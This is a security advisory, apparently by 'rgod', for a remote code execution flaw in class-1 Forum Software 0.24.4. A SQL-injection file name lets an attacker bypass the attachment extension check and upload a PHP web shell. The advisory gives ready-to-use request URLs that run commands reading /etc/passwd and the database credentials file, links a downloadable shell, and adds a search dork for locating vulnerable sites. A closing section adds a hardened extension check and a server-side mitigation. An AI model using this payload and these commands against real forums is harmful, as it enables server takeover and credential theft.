class-1 Forum Software v 0.24.4 Remote code execution

software:
site: http://www.class1web.co.uk/software

description:
class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributed under the GNU General Public License, which means that its source is freely distributed and available to the general public.

vulnerability:
the way the forum checks attachment extensions... look at the vulnerable code at viewforum.php, lines 256-272. Nothing seems so strange, but... what happens if you try to upload a file with this name?

shell.php.' or 'a'='a

[1] SQL INJECTION! The query, and other queries like this, become:

SELECT * FROM [extensions table name] WHERE extension='' or 'a'='a' AND file_type='Image'

You have bypassed the check... now an executable file is uploaded, because for Apache, both on Windows and Linux, a file with that name is an executable PHP file (mod_mime maps every dot-separated segment of the name, so the ".php" segment is enough).

you can download a poc file from my site, at url:
http://rgod.altervista.org/shell.zip

inside we have:

you can test manually: unzip the file, register, login, post this file as an attachment, then go to this url to see the directory where the attachment has been uploaded:

http://[target]/[path]/viewattach.php

you will be redirected to:

http://[target]/[path]/[upload_dir]/

then launch commands:

http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwd
to see the /etc/passwd file

http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.inc
to see the database username and password

and so on...

you can see my poc exploit at this url:
http://www.rgod.altervista.org/class1.html

googledork: "Powered by and copyright class-1"

rgod
site: http://rgod.altervista.org
mail: retrogod [at] aliceposta . it
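The root causes above are two: the extension taken from the file name is interpolated into the SQL lookup, and only the last extension is considered even though Apache evaluates every segment. The following hardened check is an added example written for this advisory, not class-1's code; it assumes a PDO handle, an extensions table named `extensions` with columns `extension` and `file_type`, and the function name `attachment_extension_allowed` (the advisory only names the table as "[extensions table name]").

```php
<?php
// Added example (not class-1's code). Assumed schema: table `extensions`
// with columns `extension` and `file_type`; $pdo is an open PDO connection.

// Segments that must never appear anywhere in an uploaded name: Apache
// mod_mime maps each dot-separated segment, so "shell.php.jpg" would still
// reach the PHP handler if only the final extension were checked.
const FORBIDDEN_SEGMENTS = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar', 'cgi', 'pl', 'sh'];

function attachment_extension_allowed(PDO $pdo, string $name, string $fileType): bool
{
    // 1. Syntactic allow-list on the whole file name: letters, digits,
    //    underscore, hyphen and dots only, with at least one extension.
    //    A name such as  shell.php.' or 'a'='a  is rejected here, before
    //    it reaches SQL or the filesystem.
    if (!preg_match('/^[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+$/', $name)) {
        return false;
    }

    $segments = explode('.', strtolower($name));

    // 2. No executable extension in any segment, not just the last one.
    foreach (array_slice($segments, 1) as $segment) {
        if (in_array($segment, FORBIDDEN_SEGMENTS, true)) {
            return false;
        }
    }

    // 3. Parameterised lookup: the extension is bound as data, never
    //    concatenated, so the WHERE clause cannot be rewritten by the name.
    $ext  = end($segments);
    $stmt = $pdo->prepare(
        'SELECT 1 FROM extensions WHERE extension = :ext AND file_type = :type LIMIT 1'
    );
    $stmt->execute([':ext' => $ext, ':type' => $fileType]);

    return $stmt->fetchColumn() !== false;
}
```

Storing attachments under a directory with PHP execution disabled (for example `php_admin_flag engine off` in the Apache vhost) is an independent second layer, so a bypass of the name check alone no longer yields code execution.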